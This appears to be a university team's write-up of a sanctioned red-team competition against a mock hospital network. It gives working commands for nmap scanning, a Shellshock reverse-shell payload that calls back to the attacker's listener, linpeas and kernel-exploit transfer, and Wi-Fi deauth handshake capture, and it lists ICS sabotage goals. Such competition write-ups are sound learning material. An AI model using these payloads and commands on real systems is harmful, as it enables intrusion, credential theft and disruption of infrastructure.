π’Hack The Building 2.0 Preliminary : Hospital Edition 2023
Our experience participating in the Hack The Building 2.0 Hospital Edition Preliminary.
About
Preliminary event force-on-force style hackathon(Blue vs. Red Team) against other Universities and whoever was within the top of the leaderboard earned a spot to attend the in person event. Our small team of about 3-4 participated as a red team in this event. Being our first time participating in such a competition we did not qualify for the in person event , but this was really fun !
Initial Foothold / Prepositioning
Scanning and Enumeration
We connected to the network using an openvpn file and started off with an initial nmap scan scanning for any open web ports within the network.
sudo nmap 172.19.99.0/24 -p80,443 -sV -T5 --min-rate 1000
We did find some hosts, but most of it was "garbage" and not useful, so we copied and pasted the nmap output into a txt file "garbage" and then sorted through the output, removing anything unecessary.
nano garbage
// Sequence of commands used for filtering
cat garbage | grep -v tcpwrapped
cat garbage | grep -v tcpwrapped | sort
cat garbage | grep -v tcpwrapped | sort | grep -v "SERVICE VERSION"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE"
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up "
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq
cat garbage | grep -v tcpwrapped | sort | grep -v "STATE SERVICE" | grep -v "Nmap scan report for " | grep -v "Host is up " | uniq > information
Vulnerability Assessment
After filtering though the Nmap output, we did find that 172.19.99.141
was running apache on port 80. After going to http://172.19.99.141 we see that the page says "What a shockingly boring page", could this be a hint at a Shellshock vulnerability???
We tried using this Nmap script to verify if the vulnerability existed on the web app, and it does exist!
sudo nmap -sV -p80 --script=http-shellshock 172.19.99.141
Shellshock Exploitation
1. Generate a Reverse Shell
Generate a revshell at https://revshells.com
Attacker IP: 10.73.1.44
Port: 5555
Listener type: nc -lvnp 5555
set advanced to on
Reverse, Bash -i
/bin/bash -i >& /dev/tcp/10.73.1.144/5555 0>&1
shell: /bin/bash
encoding: none
2. Setup a nc listener to catch the revshell
nc -lvnp 5555
3. Inspect > Network(to modify the User-Agent HTTP Request header)
Edit the
User-Agent
http request header
User-Agent:() { : ; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.73.1.144/5555 0>&1'
Send a New Request with the modified User-Agent header and view the Response
4. Profit $$$
www-data@dev-web:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/bash
man:x:6:12:man:/var/cache/man:/bin/false
lp:x:7:7:lp:/var/spool/lpd:/bin/false
mail:x:8:8:mail:/var/mail:/bin/false
news:x:9:9:news:/var/spool/news:/bin/false
uucp:x:10:10:uucp:/var/spool/uucp:/bin/false
proxy:x:13:13:proxy:/bin:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/false
list:x:38:38:Mailing List Manager:/var/list:/bin/false
irc:x:39:39:ircd:/var/run/ircd:/bin/false
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/false
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
rfabian:x:1000:1000:rfabian,,,:/home/rfabian:/bin/bash
sysadmin:x:1001:1001:,,,:/home/sysadmin:/bin/bash
ansible:x:1002:1002::/home/ansible:/bin/bash
Privilege Escalation
We got a low privileged user shell, now we can perform some local enumeration and see what can be exploited to escalate our privileges to root.
ls
index.cgi
whoami
www-data
In this case we used linpeas to see if we can find any privilege escalation vectors.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Transfer to the target by hosting it on a python web server, and using curl on the compromised machine to download it.
python3 -m http.server 80
cd /tmp
ls -la
curl http://10.73.1.144/linpeas.sh > linpeas.sh
sh linpeas.sh > linpeasoutput
Here we have some interesting Linpeas output.
OS: Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: dev-web
Writable folder: /run/shm
It looks like we have a writable folder /run/shm, but here we tried running a kernel exploit instead.
We tried compiling the kernel exploit on our attack host and then transferring it to the compromised machine using the same method we used to transfer linpeas. Unfortunately, the kernel exploit did not work.
(Attack Host)
searchsploit 41995
searchsploit -m 41995
ozzy@kali:~$ gcc 41995.c
ozzy@kali:~$ mv a.out 41995
python -m http.server 80
(Compromised Machine)
curl http://10.73.1.144/41995 > 41995
www-data@dev-web:/tmp$ chmod +x 41995
www-data@dev-web:/tmp$ ./41995
bash: ./41995: cannot execute binary file
www-data@dev-web:/tmp$ exit
^C
This being the second to last day of the preliminary we decided to take a breather and try again tomorrow , the last day...
Wi-Fi Exploitation
The next day, it was announced that for the teams that were unable to establish persistence, they were automatically given a jump host(as root) to speed things up a bit.
So with our already dedicated jump host, the next step was to perform Wi-Fi operations and try to exploit any of the Wi-Fi networks that were physically near the jumphost/compromised host.
Once we use ssh to access our jump host we can continue onto Wireless Compromise and Wireless sniffing.
iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=31 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
airmon-ng check kill
(kills processes that interfere)
airmon-ng start wlan0
iwconfig
- check if wlan0mon is active and in monitor mode
When trying to compromise Wireless networks here is a list of some things we might want to consider when monitoring Wireless networks:
BSSID = MAC address of the Access Point (AP)
CH = channel 1-14 (1,6, and 11 are big ones)
PWR = power level (closer to 0 = closer to device)
Beacons (data, 0 = not connected to the internet)
ENC (e.g. WPA2)
AUTH (e.g. PSK)
ESSID = network name, length:21 could be a hidden network
Here, given the instructions from the white team, we had to choose one of the networks we wanted to wirelessly deauth to capture its WPA handshake, which we would then attempt to crack offline to ultimately gain access to the Wi-Fi network.
airodump-ng wlan0mon
(choose a network)
CTRL + C
airodump-ng -c 6 --bssid <BSSIDofAP> -w <HTB.pcap> wlan0mon
Once the WPA handshake was captured, we only had to show a proof of concept and not actually try to crack the password. Once proof was given, we were given the actual password to connect with and then we could begin to enumerate any active and vulnerable ICS systems connected to that Wi-Fi network.
Note: There were several Wi-Fi networks, which means each Wi-Fi network had different ICS systems connected to it.
ICS Enumeration & The End...
So far we have:
Successfully exploited a web server on 172.19.99.0/24 to gain a foothold
Performed Wi-Fi exploitation from the foothold on any nearby Wi-Fi networks
Connect to the nearby Wi-Fi network
After successfully exploiting and connecting to the Wi-Fi network, we can go back to the enumeration phase and enumerate any host on that network, in this case any Industrial Control Systems(ICS) that we may be able to mess around with and accomplish any objectives that we have been assigned.
We were able to enumerate one of the ICS that we were tasked to mess around with and cause chaos(forgot to take screenshots of the nmap scans), but at this point we ran out of time and we were unable to exploit any of the ICS :(
Just to get an idea of what some of the challenges were like, they included:
Take control of systems controlling a lake, and then try to make the lake flood
Disable a power grid for a complete "lights out"
Disable sewage systems
Turn on a ferris wheel
Shutoff camera systems
Disable crane operations
Manipulate and disrupt a conveyor belt system
Overall, this competition was fun and a great learning experience, hopefully UNG can qualify for Hack The Building 3.0 whenever it is announced!
Last updated